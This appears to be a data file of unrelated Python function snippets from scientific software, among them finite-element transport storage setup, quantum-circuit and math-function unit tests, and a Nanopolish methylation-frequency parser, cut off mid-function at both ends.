Quadrature.SimplexLobattoQuadrature(self.nSpace_global,1)\n elementBoundaryQuadratureDict={}\n if isinstance(elementBoundaryQuadrature,dict): #set terms manually\n for I in self.coefficients.elementBoundaryIntegralKeys:\n if elementBoundaryQuadrature.has_key(I):\n elementBoundaryQuadratureDict[I] = elementBoundaryQuadrature[I]\n else:\n elementBoundaryQuadratureDict[I] = elementBoundaryQuadrature['default']\n else:\n for I in self.coefficients.elementBoundaryIntegralKeys:\n elementBoundaryQuadratureDict[I] = elementBoundaryQuadrature\n #\n # find the union of all element quadrature points and\n # build a quadrature rule for each integral that has a\n # weight at each point in the union\n #mwf include tag telling me which indices are which quadrature rule?\n (self.elementQuadraturePoints,self.elementQuadratureWeights,\n self.elementQuadratureRuleIndeces) = Quadrature.buildUnion(elementQuadratureDict)\n self.nQuadraturePoints_element = self.elementQuadraturePoints.shape[0]\n self.nQuadraturePoints_global = self.nQuadraturePoints_element*self.mesh.nElements_global\n #\n #Repeat the same thing for the element boundary quadrature\n #\n (self.elementBoundaryQuadraturePoints,\n self.elementBoundaryQuadratureWeights,\n self.elementBoundaryQuadratureRuleIndeces) = Quadrature.buildUnion(elementBoundaryQuadratureDict)\n self.nElementBoundaryQuadraturePoints_elementBoundary = self.elementBoundaryQuadraturePoints.shape[0]\n self.nElementBoundaryQuadraturePoints_global = (self.mesh.nElements_global*\n self.mesh.nElementBoundaries_element*\n self.nElementBoundaryQuadraturePoints_elementBoundary)\n\n #\n #storage dictionaries\n self.scalars_element = set()\n #\n #simplified allocations for test==trial and also check if space is mixed or not\n #\n self.q={}\n self.ebq={}\n self.ebq_global={}\n self.ebqe={}\n self.phi_ip={}\n #mesh\n self.q['x'] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,3),'d')\n self.q['det(J)'] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q['abs(det(J))'] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q['J'] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nSpace_global,self.nSpace_global),'d')\n self.q['inverse(J)'] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nSpace_global,self.nSpace_global),'d')\n self.ebqe['x'] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,3),'d')\n self.ebqe['g'] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n max(1,self.nSpace_global-1),\n max(1,self.nSpace_global-1)),\n 'd')\n self.ebqe['inverse(J)'] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nSpace_global,self.nSpace_global),'d')\n self.ebqe['hat(x)'] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,3),'d')\n self.ebqe['bar(x)'] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,3),'d')\n self.ebqe['sqrt(det(g))'] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary),'d')\n self.ebqe[('n')] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nSpace_global),'d')\n #shape\n self.q[('v',0)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[0]),'d')\n self.q[('w',0)] = self.q[('v',0)]\n self.q[('grad(v)',0)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[0],self.nSpace_global),'d')\n self.q[('grad(w)',0)] = self.q[('grad(v)',0)]\n self.q[('grad(w)*dV',0)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[0],self.nSpace_global),'d')\n self.q[('grad(w)*dV_f',0)] = self.q[('grad(w)*dV',0)]\n #todo get rid of dV_{f,a}, etc\n self.q[('w*dV',0)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[0]),'d')\n self.q[('w*dV_m',0)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[0]),'d')\n #assume all components are the same space for now\n shapeKeysForAlias = ['v','w','grad(v)','grad(w)*dV','grad(w)*dV_f','w*dV','w*dV_m']\n for ci in range(1,self.nc):\n for key in shapeKeysForAlias:\n key_ci = (key,ci)\n key_0 = (key,0)\n self.q[key_ci] = self.q[key_0]\n #ELLAM weights stiffness, body integrals by dt\n for ci in range(self.nc):\n self.q[('dt*grad(w)*dV',ci)]= numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[ci],self.nSpace_global),'d')\n #\n self.ebqe[('v',0)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nDOF_trial_element[0]),'d')\n self.ebqe[('w',0)] = self.ebqe[('v',0)]\n self.ebqe[('grad(v)',0)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nDOF_trial_element[0],self.nSpace_global),'d')\n self.ebqe[('w*dS_f',0)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nDOF_trial_element[0]),'d')\n #assume all components are the same space for now\n shapeKeysForAlias = ['v','w','grad(v)','w*dS_f']\n for ci in range(1,self.nc):\n for key in shapeKeysForAlias:\n key_ci = (key,ci)\n key_0 = (key,0)\n self.ebqe[key_ci] = self.ebqe[key_0]\n\n for ci in range(self.nc):\n self.q[('u',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q[('grad(u)',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nSpace_global),'d')\n #f\n for ci in self.coefficients.advection.keys():\n self.q[('f',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nSpace_global),'d')\n for cj in self.coefficients.advection[ci].keys():\n self.q[('df',ci,cj)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nSpace_global),'d')\n self.ebqe[('f',ci)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nSpace_global),'d')\n for cj in self.coefficients.advection[ci].keys():\n self.ebqe[('df',ci,cj)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary,self.nSpace_global),'d')\n\n #a, linear dispersion single component\n\n for ci,ckDict in self.coefficients.diffusion.iteritems():\n for ck,cjDict in ckDict.iteritems():\n for flag in cjDict.values():\n assert flag == 'constant', \"Error potential %s LADRellam does not handle diffusion = %s yet\" % (ck,flag)\n\n if self.coefficients.sdInfo != None and (ci,ck) in self.coefficients.sdInfo.keys():\n self.q[('a',ci,ck)] = numpy.zeros(\n (self.mesh.nElements_global,\n self.nQuadraturePoints_element,\n self.coefficients.sdInfo[(ci,ck)][0][self.nSpace_global]),\n 'd')\n for cj in cjDict.keys():\n self.q[('da',ci,ck,cj)] = numpy.zeros(\n (self.mesh.nElements_global,\n self.nQuadraturePoints_element,\n self.coefficients.sdInfo[(ci,ck)][0][self.nSpace_global]),\n 'd')\n self.ebqe[('a',ci,ck)]=numpy.zeros(\n (self.mesh.nExteriorElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.coefficients.sdInfo[(ci,ck)][0][self.nSpace_global]),\n 'd')\n for cj in cjDict.keys():\n self.ebqe[('da',ci,ck,cj)]=numpy.zeros(\n (self.mesh.nExteriorElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.coefficients.sdInfo[(ci,ck)][0][self.nSpace_global]),\n 'd')\n\n else:\n self.q[('a',ci,ck)]=numpy.zeros(\n (self.mesh.nElements_global,\n self.nQuadraturePoints_element,\n self.nSpace_global,\n self.nSpace_global),\n 'd')\n for cj in cjDict.keys():\n self.q[('da',ci,ck,cj)]=numpy.zeros(\n (self.mesh.nElements_global,\n self.nQuadraturePoints_element,\n self.nSpace_global,\n self.nSpace_global),\n 'd')\n self.ebqe[('a',ci,ck)]=numpy.zeros(\n (self.mesh.nExteriorElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nSpace_global,\n self.nSpace_global),\n 'd')\n for cj in cjDict.keys():\n self.ebqe[('da',ci,ck,cj)]=numpy.zeros(\n (self.mesh.nExteriorElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nSpace_global,\n self.nSpace_global),\n 'd')\n #dense storage\n self.q[('grad(w)*dV_a',ci,ck)] = self.q[('grad(w)*dV_f',ci)]\n self.q[('dt*grad(w)*dV_a',ci,ck)]= self.q[('dt*grad(w)*dV',ci)]\n #ci,ckDict\n #linear potential only for now, need to change for e.g., Buckley Leverett\n for ck in self.phi.keys():\n self.phi[ck].dof[:]=self.u[ck].dof\n self.q[('grad(phi)',ck)] = self.q[('grad(u)',ck)]\n for key in self.dphi.keys():\n self.dphi[key].dof.fill(1.0)\n self.q[('dphi',key[0],key[1])] = numpy.ones((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n\n\n\n# if self.coefficients.diffusion.has_key(0):\n# for ck,flag in self.coefficients.diffusion[0][0].iteritems():\n# assert self.coefficients.diffusion[0][0][ck] == 'constant', \"Error potential %s LADRellam does not handle diffusion = %s yet\" % (ck,flag)\n# if self.coefficients.sdInfo != None and (0,0) in self.coefficients.sdInfo.keys():\n# self.q[('a',0,0)] = numpy.zeros(\n# (self.mesh.nElements_global,\n# self.nQuadraturePoints_element,\n# self.coefficients.sdInfo[(0,0)][0][self.nSpace_global]),\n# 'd')\n# self.q[('da',0,0,0)] = numpy.zeros(\n# (self.mesh.nElements_global,\n# self.nQuadraturePoints_element,\n# self.coefficients.sdInfo[(0,0)][0][self.nSpace_global]),\n# 'd')\n# self.ebqe[('a',0,0)]=numpy.zeros(\n# (self.mesh.nExteriorElementBoundaries_global,\n# self.nElementBoundaryQuadraturePoints_elementBoundary,\n# self.coefficients.sdInfo[(0,0)][0][self.nSpace_global]),\n# 'd')\n# self.ebqe[('da',0,0,0)]=numpy.zeros(\n# (self.mesh.nExteriorElementBoundaries_global,\n# self.nElementBoundaryQuadraturePoints_elementBoundary,\n# self.coefficients.sdInfo[(0,0)][0][self.nSpace_global]),\n# 'd')\n\n# else:\n# self.q[('a',0,0)]=numpy.zeros(\n# (self.mesh.nElements_global,\n# self.nQuadraturePoints_element,\n# self.nSpace_global,\n# self.nSpace_global),\n# 'd')\n# self.q[('da',0,0,0)]=numpy.zeros(\n# (self.mesh.nElements_global,\n# self.nQuadraturePoints_element,\n# self.nSpace_global,\n# self.nSpace_global),\n# 'd')\n# self.ebqe[('a',0,0)]=numpy.zeros(\n# (self.mesh.nExteriorElementBoundaries_global,\n# self.nElementBoundaryQuadraturePoints_elementBoundary,\n# self.nSpace_global,\n# self.nSpace_global),\n# 'd')\n# self.ebqe[('da',0,0,0)]=numpy.zeros(\n# (self.mesh.nExteriorElementBoundaries_global,\n# self.nElementBoundaryQuadraturePoints_elementBoundary,\n# self.nSpace_global,\n# self.nSpace_global),\n# 'd')\n# #\n# self.phi[0].dof[:]=self.u[0].dof\n# self.dphi[(0,0)].dof.fill(1.0)\n# self.q[('grad(phi)',0)] = self.q[('grad(u)',0)]\n# self.q[('dphi',0,0)] = numpy.ones((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n\n# self.q[('grad(w)*dV_a',0,0)] = self.q[('grad(w)*dV_f',0)]\n# self.q[('dt*grad(w)*dV_a',0,0)]= self.q[('dt*grad(w)*dV',0)]\n\n #r 'constant' ie not a function of solution but go ahead and include dr for now\n for ci,cjDict in self.coefficients.reaction.iteritems():\n self.q[('r',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n for cj in cjDict.keys():\n self.q[('dr',ci,cj)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q[('w*dV_r',ci)] = self.q[('w*dV',ci)]\n self.q[('dt*w*dV_r',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,self.nDOF_trial_element[0]),'d')\n self.ebqe[('r',ci)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary),'d')\n\n #m\n for ci,cjDict in self.coefficients.mass.iteritems():\n self.q[('m',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n for cj in cjDict.keys():\n self.q[('dm',ci,cj)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q[('mt',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q[('m_last',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q[('m_tmp',ci)] = self.q[('m',ci)]\n self.q[('cfl',ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.q[('numDiff',ci,ci)] = numpy.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element),'d')\n self.ebqe[('m',ci)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary),'d')\n for cj in cjDict.keys():\n self.ebqe[('dm',ci,cj)] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary),'d')\n\n\n ###ellam specific options with defauls here\n self.ellamDiscretization = ELLAMtools.ELLAMdiscretization(self,options)\n\n #\n self.needEBQ = options.needEBQ #could need for analytical velocity evaluation with RT0,BDM\n\n #beg normal stuff allocating things\n self.points_elementBoundaryQuadrature= set()\n self.scalars_elementBoundaryQuadrature= set([('u',ci) for ci in range(self.nc)])\n self.vectors_elementBoundaryQuadrature= set()\n self.tensors_elementBoundaryQuadrature= set()\n\n if self.needEBQ:\n for k in ['x','hat(x)']:\n self.ebq[k] = numpy.zeros((self.mesh.nElements_global,\n self.mesh.nElementBoundaries_element,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n 3),'d')\n self.ebq['n'] = numpy.zeros((self.mesh.nElements_global,\n self.mesh.nElementBoundaries_element,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nSpace_global),'d')\n self.ebq['inverse(J)'] = numpy.zeros((self.mesh.nElements_global,\n self.mesh.nElementBoundaries_element,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nSpace_global,\n self.nSpace_global),'d')\n #allocate the metric tensor\n self.ebq['g'] = numpy.zeros((self.mesh.nElements_global,\n self.mesh.nElementBoundaries_element,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n max(1,self.nSpace_global-1),\n max(1,self.nSpace_global-1)),\n 'd')\n log(memory(\"element boundary quadrature\",\"LADRellam\"),level=4)\n ebq_keys = ['sqrt(det(g))']\n ebq_keys.extend([('u',ci) for ci in range(self.nc)])\n for k in ebq_keys:\n self.ebq[k] = numpy.zeros((self.mesh.nElements_global,\n self.mesh.nElementBoundaries_element,\n self.nElementBoundaryQuadraturePoints_elementBoundary),'d')\n\n #test and trial info\n self.ebq[('w',0)] = numpy.zeros((self.mesh.nElements_global,\n self.mesh.nElementBoundaries_element,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nDOF_trial_element[0]),'d')\n for ci in range(1,self.nc):\n self.ebq[('w',ci)] = self.ebq[('w',0)]\n for ci in range(self.nc):\n self.ebq[('v',ci)] = self.ebq[('w',0)]\n\n #ebq_global info\n self.ebq_global['x'] = numpy.zeros((self.mesh.nElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n 3),'d')\n self.ebq_global['n'] = numpy.zeros((self.mesh.nElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nSpace_global),'d')\n #\n # allocate residual and Jacobian storage\n #\n self.elementResidual = [numpy.zeros(\n (self.mesh.nElements_global,\n self.nDOF_test_element[ci]),\n 'd') for ci in range(self.nc)]\n self.elementSpatialResidual = [numpy.zeros(\n (self.mesh.nElements_global,\n self.nDOF_test_element[ci]),\n 'd') for ci in range(self.nc)]\n self.elementJacobian = {}\n for ci in range(self.nc):\n self.elementJacobian[ci]={}\n for cj in range(self.nc):\n if cj in self.coefficients.stencil[ci]:\n self.elementJacobian[ci][cj] = numpy.zeros(\n (self.mesh.nElements_global,\n self.nDOF_test_element[ci],\n self.nDOF_trial_element[cj]),\n 'd')\n #\n self.fluxJacobian_exterior = {}\n for ci in range(self.nc):\n self.fluxJacobian_exterior[ci]={}\n for cj in self.coefficients.stencil[ci]:\n self.fluxJacobian_exterior[ci][cj] = numpy.zeros(\n (self.mesh.nExteriorElementBoundaries_global,\n self.nElementBoundaryQuadraturePoints_elementBoundary,\n self.nDOF_trial_element[cj]),\n 'd')\n\n #\n #\n #\n #\n log(memory(\"element and element boundary Jacobians\",\"OneLevelTransport\"),level=4)\n self.inflowBoundaryBC = {}\n self.inflowBoundaryBC_values = {}\n self.inflowFlux = {}\n for cj in range(self.nc):\n self.inflowBoundaryBC[cj] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,),'i')\n self.inflowBoundaryBC_values[cj] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nDOF_trial_element[cj]),'d')\n self.inflowFlux[cj] = numpy.zeros((self.mesh.nExteriorElementBoundaries_global,self.nElementBoundaryQuadraturePoints_elementBoundary),'d')\n self.internalNodes = set(range(self.mesh.nNodes_global))\n #identify the internal nodes this is ought to be in mesh\n ##\\todo move this to mesh\n for ebNE in range(self.mesh.nExteriorElementBoundaries_global):\n ebN = self.mesh.exteriorElementBoundariesArray[ebNE]\n eN_global = self.mesh.elementBoundaryElementsArray[ebN,0]\n ebN_element = self.mesh.elementBoundaryLocalElementBoundariesArray[ebN,0]\n for i in range(self.mesh.nNodes_element):\n if i != ebN_element:\n I = self.mesh.elementNodesArray[eN_global,i]\n self.internalNodes -= set([I])\n self.nNodes_internal = len(self.internalNodes)\n self.internalNodesArray=numpy.zeros((self.nNodes_internal,),'i')\n for nI,n in enumerate(self.internalNodes):\n self.internalNodesArray[nI]=n\n #\n del self.internalNodes\n self.internalNodes = None\n log(\"Updating local to global mappings\",2)\n self.updateLocal2Global()\n log(\"Building time integration object\",2)\n log(memory(\"inflowBC, internalNodes,updateLocal2Global\",\"OneLevelTransport\"),level=4)\n #mwf for interpolating subgrid error for gradients etc\n if self.stabilization and self.stabilization.usesGradientStabilization:\n self.timeIntegration = TimeIntegrationClass(self,integrateInterpolationPoints=True)\n else:\n self.timeIntegration = TimeIntegrationClass(self)\n\n if options != None:\n self.timeIntegration.setFromOptions(options)\n log(memory(\"TimeIntegration\",\"OneLevelTransport\"),level=4)\n log(\"Calculating numerical quadrature formulas\",2)\n self.calculateQuadrature()\n #lay out components/equations contiguously for now\n self.offset = [0]\n for ci in range(1,self.nc):\n self.offset += [self.offset[ci-1]+self.nFreeDOF_global[ci-1]]\n self.stride = [1 for ci in range(self.nc)]\n #use contiguous layout of components for parallel, requires weak DBC's\n comm = Comm.get()\n self.comm=comm\n if comm.size() > 1:\n assert numericalFluxType != None and numericalFluxType.useWeakDirichletConditions,\"You must use a numerical flux to apply weak boundary conditions for parallel runs\"\n self.offset = [0]\n for ci in range(1,self.nc):\n self.offset += [ci]\n self.stride = [self.nc for ci in range(self.nc)]\n #\n log(memory(\"stride+offset\",\"OneLevelTransport\"),level=4)\n if numericalFluxType != None:\n if options == None or options.periodicDirichletConditions == None:\n self.numericalFlux = numericalFluxType(self,\n dofBoundaryConditionsSetterDict,\n advectiveFluxBoundaryConditionsSetterDict,\n diffusiveFluxBoundaryConditionsSetterDictDict)\n else:\n self.numericalFlux = numericalFluxType(self,\n dofBoundaryConditionsSetterDict,\n advectiveFluxBoundaryConditionsSetterDict,\n diffusiveFluxBoundaryConditionsSetterDictDict,\n options.periodicDirichletConditions)\n else:\n self.numericalFlux = None\n #set penalty terms\n #cek todo move into numerical flux initialization\n if self.ebq_global.has_key('penalty'):\n for ebN in range(self.mesh.nElementBoundaries_global):\n for k in range(self.nElementBoundaryQuadraturePoints_elementBoundary):\n self.ebq_global['penalty'][ebN,k] = self.numericalFlux.penalty_constant/(self.mesh.elementBoundaryDiametersArray[ebN]**self.numericalFlux.penalty_power)\n #penalty term\n #cek move to Numerical flux initialization\n if self.ebqe.has_key('penalty'):\n for ebNE in range(self.mesh.nExteriorElementBoundaries_global):\n ebN = self.mesh.exteriorElementBoundariesArray[ebNE]\n for k in range(self.nElementBoundaryQuadraturePoints_elementBoundary):\n self.ebqe['penalty'][ebNE,k] = self.numericalFlux.penalty_constant/self.mesh.elementBoundaryDiametersArray[ebN]**self.numericalFlux.penalty_power\n log(memory(\"numericalFlux\",\"OneLevelTransport\"),level=4)\n self.elementEffectiveDiametersArray = self.mesh.elementInnerDiametersArray\n #use post processing tools to get conservative fluxes, None by default\n import PostProcessingTools\n self.velocityPostProcessor = PostProcessingTools.VelocityPostProcessingChooser(self)\n log(memory(\"velocity postprocessor\",\"OneLevelTransport\"),level=4)\n #helper for writing out data storage\n import Archiver\n self.elementQuadratureDictionaryWriter = Archiver.XdmfWriter()\n self.elementBoundaryQuadratureDictionaryWriter = Archiver.XdmfWriter()\n self.exteriorElementBoundaryQuadratureDictionaryWriter = Archiver.XdmfWriter()\n #TODO get rid of this\n for ci,fbcObject in self.fluxBoundaryConditionsObjectsDict.iteritems():\n self.ebqe[('advectiveFlux_bc_flag',ci)] = numpy.zeros(self.ebqe[('advectiveFlux_bc',ci)].shape,'i')\n for t,g in fbcObject.advectiveFluxBoundaryConditionsDict.iteritems():\n if self.coefficients.advection.has_key(ci):\n self.ebqe[('advectiveFlux_bc',ci)][t[0],t[1]] = g(self.ebqe[('x')][t[0],t[1]],self.timeIntegration.t)\n self.ebqe[('advectiveFlux_bc_flag',ci)][t[0],t[1]] = 1\n\n if hasattr(self.numericalFlux,'setDirichletValues'):\n self.numericalFlux.setDirichletValues(self.ebqe)\n if not hasattr(self.numericalFlux,'isDOFBoundary'):\n self.numericalFlux.isDOFBoundary = {}\n for ci in range(self.nc):\n self.numericalFlux.isDOFBoundary[ci]= numpy.zeros(self.ebqe[('u',ci)].shape,'i')\n if not hasattr(self.numericalFlux,'ebqe'):\n self.numericalFlux.ebqe = {}\n for ci in range(self.nc):\n self.numericalFlux.ebqe[('u',ci)]= numpy.zeros(self.ebqe[('u',ci)].shape,'d')", "def test_coefficients_tf_interface(self):\n import tensorflow as tf\n\n qnode = qml.QNode(self.circuit, self.dev)\n\n weights = tf.Variable([0.5, 0.2])\n\n obtained_result = coefficients(partial(qnode, weights), 2, 1)\n\n assert np.allclose(obtained_result, self.expected_result)", "def __call__(self, x):\n\n self.dbeads.q = x\n e = self.dforces.pot # Energy\n g = -self.dforces.f # Gradient\n\n return e, g", "def test_functions(self):\n\n # exp\n\n e_ref = 2.71828182845904523536028747135281\n ee_ref = 15.1542622414792641897604302726327\n\n self.assertTrue(isclose(\n common_math.exp(0),\n 1\n ))\n self.assertTrue(isclose(\n common_math.exp(1),\n e_ref\n ))\n self.assertTrue(isclose(\n common_math.exp(e_ref),\n ee_ref\n ))\n\n # sqrt\n \n s2_ref = 1.41421356237309504880168872420977\n s3_ref = 1.73205080756887729352744634150584\n e2_ref = 7.3890560989306502272304274605753\n ef2_ref = 1.6487212707001281468486507878142\n\n self.assertTrue(isclose(\n common_math.sqrt(0),\n 0\n ))\n self.assertTrue(isclose(\n common_math.sqrt(1),\n 1\n ))\n self.assertTrue(isclose(\n common_math.sqrt(4),\n 2\n ))\n self.assertTrue(isclose(\n common_math.sqrt(2),\n s2_ref\n ))\n self.assertTrue(isclose(\n common_math.sqrt(3),\n s3_ref\n ))\n self.assertTrue(isclose(\n common_math.sqrt(e2_ref),\n e_ref\n ))\n self.assertTrue(isclose(\n common_math.sqrt(e_ref),\n ef2_ref\n ))\n\n # cbrt\n \n e3_ref = 20.0855369231876677409285296545811\n ef3_ref = 1.39561242508608952862812531960265\n\n self.assertTrue(isclose(\n common_math.cbrt(0),\n 0\n ))\n self.assertTrue(isclose(\n common_math.cbrt(1),\n 1\n ))\n self.assertTrue(isclose(\n common_math.cbrt(-1),\n -1\n ))\n self.assertTrue(isclose(\n common_math.cbrt(8),\n 2\n ))\n self.assertTrue(isclose(\n common_math.cbrt(-0.125),\n -0.5\n ))\n self.assertTrue(isclose(\n common_math.cbrt(e3_ref),\n e_ref\n ))\n self.assertTrue(isclose(\n common_math.cbrt(e_ref),\n ef3_ref\n ))\n\n # hypot\n\n self.assertTrue(isclose(\n common_math.hypot(0, 0),\n 0\n ))\n self.assertTrue(isclose(\n common_math.hypot(1, 0),\n 1\n ))\n self.assertTrue(isclose(\n common_math.hypot(1, 1),\n s2_ref\n ))\n self.assertTrue(isclose(\n common_math.hypot(1, s2_ref),\n s3_ref\n ))\n self.assertTrue(isclose(\n common_math.hypot(1, s3_ref),\n 2\n ))\n self.assertTrue(isclose(\n common_math.hypot(s3_ref, 1),\n 2\n ))\n\n # asinh\n\n sh1_ref = 1.17520119364380145688238185059568\n she_ref = 7.54413710281697582634182004251749\n\n self.assertTrue(isclose(\n common_math.asinh(0),\n 0\n ))\n self.assertTrue(isclose(\n common_math.asinh(sh1_ref),\n 1\n ))\n self.assertTrue(isclose(\n common_math.asinh(-sh1_ref),\n -1\n ))\n self.assertTrue(isclose(\n common_math.asinh(she_ref),\n e_ref\n ))\n\n # cosh\n\n ch1_ref = 1.54308063481524377847790562075713\n che_ref = 7.61012513866228836341861023011441\n\n self.assertTrue(isclose(\n common_math.acosh(1),\n 0\n ))\n self.assertTrue(isclose(\n common_math.acosh(ch1_ref),\n 1\n ))\n self.assertTrue(isclose(\n common_math.acosh(che_ref),\n e_ref\n ))\n\n # re\n\n self.assertTrue(common_math.re(0) == 0)\n self.assertTrue(common_math.re(1) == 1)\n self.assertTrue(common_math.re(e_ref) == e_ref)\n self.assertTrue(common_math.re(2j**2) == -4)\n self.assertTrue(common_math.re(3+4j) == 3)", "def __init__ (self,\n input_fn:\"str\",\n fasta_index:\"str\"=\"\",\n output_bed_fn:\"str\"=\"\",\n output_tsv_fn:\"str\"=\"\",\n min_depth:\"int\"=10,\n sample_id:\"str\"=\"\",\n strand_specific:\"bool\"=False,\n min_llr:\"float\"=2,\n verbose:\"bool\"=False,\n quiet:\"bool\"=False):\n\n # Save init options in dict for later\n kwargs = locals()\n\n # Define overall verbose level\n log = get_logger(name=\"Freq_meth_calculate\", verbose=verbose, quiet=quiet)\n\n # Print option summary log\n log.debug (\"## Options summary ##\")\n log.debug (\"\\tpackage_name: {}\".format(package_name))\n log.debug (\"\\tpackage_version: {}\".format(package_version))\n log.debug (\"\\ttimestamp: {}\".format(str(datetime.datetime.now())))\n log.debug (dict_to_str(kwargs, nsep=1, exclude_list=[\"self\"]))\n\n # Verify parameters validity\n log.warning (\"## Checking arguments ##\")\n\n # Try to read input file if not a stream\n log.debug(\"\\tTesting input file readability\")\n if input_fn != 0 and not file_readable (input_fn):\n raise IOError (\"Cannot read input file\")\n\n # Verify that at least one output file is given:\n log.debug(\"\\tCheck output file\")\n if not output_bed_fn and not output_tsv_fn:\n raise NanopolishCompError(\"At least one output file should be given\")\n if output_bed_fn:\n if os.path.dirname(output_bed_fn):\n mkdir (os.path.dirname(output_bed_fn), exist_ok=True)\n log.debug(\"\\t\\tOutput results in bed format\")\n if output_tsv_fn:\n if os.path.dirname(output_tsv_fn):\n mkdir (os.path.dirname(output_tsv_fn), exist_ok=True)\n log.debug(\"\\t\\tOutput results in tsv format\")\n\n # Create self variables\n counter = Counter()\n\n log.warning (\"## Parsing methylation_calls file ##\")\n # Init SGC class with fasta_index\n if fasta_index:\n SGC.set_chrom_list(fasta_index)\n\n # Create collection to store results\n site_dict = defaultdict(list)\n\n try:\n input_fp = open (input_fn, \"r\")\n\n log.info (\"\\tStarting to parse file Nanopolish methylation call file\")\n header_line = input_fp.readline()\n byte_offset = len(header_line)\n lp = LineParser(header_line, sep=\"\\t\", cast_numeric_field=True)\n\n for line in tqdm(input_fp, desc=\"\\t\", unit=\" lines\", disable=log.level>=30):\n counter[\"Total read lines\"]+=1\n byte_len = len(line)\n l = lp(line)\n \n if not l:\n # Failsafe if line is malformed\n counter[\"Invalid read line\"]+=1\n else:\n # Store byte offset corresponding to appropriate line\n counter[\"Valid read lines\"]+=1\n if strand_specific:\n coord = SGC(l.chromosome, l.start, l.strand)\n else:\n coord = SGC(l.chromosome, l.start)\n site_dict[coord].append(byte_offset)\n byte_offset += byte_len\n\n log.info (\"\\tFiltering out low coverage sites\")\n filtered_site_dict = defaultdict(list)\n for k, offset_list in site_dict.items():\n counter[\"Total sites\"]+=1\n\n # If low coverage unset list to release memory\n if len(offset_list) < min_depth:\n counter[\"Low coverage sites\"]+=1\n else:\n counter[\"Valid sites\"]+=1\n filtered_site_dict[k]=offset_list\n del site_dict\n\n if not filtered_site_dict:\n raise NanopolishCompError (\"No valid sites left after coverage filtering\")\n\n if fasta_index:\n log.info (\"\\tSorting by coordinates\")\n filtered_site_dict = OrderedDict(sorted(filtered_site_dict.items(), key=lambda t: t[0]))\n\n log.info (\"\\tProcessing valid sites found\")\n Site.set_class_param(strand_specific=strand_specific, min_llr=min_llr)\n\n log.debug (\"\\t\\tWrite output file header\")\n if output_bed_fn:\n 